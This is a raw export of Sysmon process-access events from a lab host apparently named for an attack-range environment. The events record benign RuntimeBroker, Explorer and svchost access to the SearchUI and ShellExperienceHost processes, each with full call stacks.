10341000x800000000000000011237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000011236Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011235Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011234Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011233Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43566272C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011232Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011231Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000011230Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011229Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011228Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.781{266CAFBE-64C5-6064-A500-00000000AE01}43565264C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011227Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-64C5-6064-A500-00000000AE01}43565484C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011226Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011225Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011224Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.766{266CAFBE-64C5-6064-A500-00000000AE01}43562224C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109196|C:\Windows\System32\TwinUI.dll+82af7|C:\Windows\System32\TwinUI.dll+beb2e|C:\Windows\System32\TwinUI.dll+beaf9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011223Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011222Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ad|C:\Windows\SYSTEM32\psmserviceexthost.dll+11025|C:\Windows\SYSTEM32\psmserviceexthost.dll+1089f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011221Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011220Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:02.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12eec|C:\Windows\SYSTEM32\psmserviceexthost.dll+15afb|C:\Windows\SYSTEM32\psmserviceexthost.dll+100ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+10470|C:\Windows\SYSTEM32\psmserviceexthost.dll+13922|C:\Windows\SYSTEM32\psmserviceexthost.dll+160f9|C:\Windows\SYSTEM32\psmserviceexthost.dll+16bc3|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000011281Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011280Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011279Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011278Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011277Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:03.984{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fe